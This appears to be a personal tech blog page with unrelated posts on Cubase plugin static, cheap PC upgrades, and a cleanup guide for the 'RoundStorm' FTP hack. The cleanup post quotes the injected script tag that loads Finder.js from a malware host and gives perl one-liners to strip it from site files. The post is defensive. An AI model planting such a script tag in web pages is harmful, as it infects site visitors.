Cubase Track and VST Instrument Garble Fix – Static playback

A common setup with Cubase from 3.0 on is to install Komplete instrument sets and vst plugins. Anyone using this setup will and can experience random garbling of a track, midi instrument, or random effects. This random situation can show up by having a great recording session where everything sounds great and then reopening the project later to find a midi track causing static to the playback.

TLDR

Remove unneeded tracks
Remove any effects from tracks not being used or needed
Unload any VST intruments that are not being used for the current project
Consolidate tracks if you can

To explain my setup in particular:

AMD 2.6 Quadcore
4 gigs of ram
SATA 300 Baracudas
M-Audio Fast Track Pro
Cubase 5
Acid 6
Komplete 5 and 6
Amplitube – Hendrix, Fender
Voxengo
Antares Vocal FX etc.
Synthology Pianos

What appears to happen is that as you add tracks to Cubase and effects to those tracks, Cubase has to always keep those loaded and ready to go – even if you have them muted or you have the effect on the track turned off.

1 solution is to remove any effects that you don’t need from your various tracks. Also unload any instruments you are not needing for the current project. Finally, consolidate tracks if you can. I was using 4 tracks for one guitar line and working at perfecting that single instrument. Having Guitar Rig running for 4 tracks of the same instrument was causing problems. I moved all the tracks to one and deleted the other tracks and the problem was fixed.

If you have a full powered system and need the tons of tracks and you are using instruments. Look into Cubase VST Link. This can be a little trying to get working, however, the benefit is that you can link additional computers to each other and dedicate, for instance, one computer to only handle you instruments. This second computer does not necessarily have to be a full quadcore etc. Since you are dedicating the machine to one function a powerful single or dual core could many times do the trick.

RoundStorm FTP Hack – Solution

This past weekend a few of my FTP accounts got hacked via a Java virus that is being spread via roundstorm.com, I posted some more info and a fix below.

The following code was being injected into all Javascript files found via FTP.

All index/home/footer & header HTML files had this code

<script type="text/javascript" src="http://roundstorm.com:8080/Finder.js">script>

Solution

Via shell access to your server you can run the following command:

perl -pi -w -e 's/(\n?)( ?)document.write.*ipt>.\);/ /g' `grep -ril roundstorm *`
perl -pi -w -e 's/.*roundstorm.*|.*4561fc54d91b71ee303e54dd3da18ccf.*/ /g' `grep -ril 4561fc54d91b71ee303e54dd3da18ccf *`
```
NOTE Replace the unique identifier on the last line from “4561fc54d91b71ee303e54dd3da18ccf” to whatever is found in your html files. This command basically searches all files for the unique roundstorm identifier and removes it. This ID is going to be different for each FTP account that has been hacked.

This command finds all files infected with the roundstorm hack and remove the infected code.

After you clean up the files run a virus clean up on your computer. I used malwarebytes. Also remember to upadate all your FTP PASSWORDS and DO NOT save any FTP information on your FTP Client.

Other solutions:

Restore a backup of the site. If you have cPanel or Plesk this should be easy.
If your site is in a version control system you can simply revert all changed files.
Nick, from our comments area below, suggested a PHP script would be more helpful for those users who do not have shell access. Let me know via the comments area if this is in high demand, I can probably devote some time to creating a script this week.

February 8th, 2010 – Cheap computer upgrades

There is always a point when you would like to upgrade a computer, you don’t want to spend money on the upgrade, and you still want to use some existing parts.

I found myself in this same situation this week. The long and short of it is I had a Western Digital 750gig harddrive, 2 x gskill 1066 2gig memory sticks, a case/fan, and a VisionTek 3650. What was killing me was a 3gig Pentium processor and old motherboard.

The best upgrade found was:

AMD Phenom 8750 triple core 2.4Ghz processor – AM2+ Socket – $65
ASUS M2A74-AM - $60

Total upgrade was $125. Newegg.com offered free shipping and with their multiple distribution locations accross the U.S., I received the parts in less than 24 hours. The processor did not come with a heatsink so grab one if you need one. If you are in need of memory, the GSkill brand found at newegg.com gets high marks from buyers and the price point of $50 per 2gigs of ddr2 1066 is excellent.

Now this article is not about cutting edge performance or competition machines. This was an upgrade for a work machine used for Photoshop/M.S. Office. It was and always is tough to look at upgrading a work machine and not want to spend a little extra to get the best parts, but the reality can sometimes be you just don’t need it for the work machine.

On a side note … the AMD line of processors has been known for ease of overclocking and the ability to unlock additional cores. The AMD 8750 in particular is able to overclock with a good heatsink to 3Ghz making it a better bang for the buck.

I’ve had many days that could have ended this way. Some think this is fake. Some common tells of a fake is the camera moving, which this doesn’t. The office looks like it is a real office. A ton of detail would have been put into the props and setup … not a ton of payoff if it is a fake.

With some of te hits to this article wondering if it was a fake I found the second video from a person in the first holding a cell phone posted in the rest of this article. This one has audio. My guess is it is still legit.
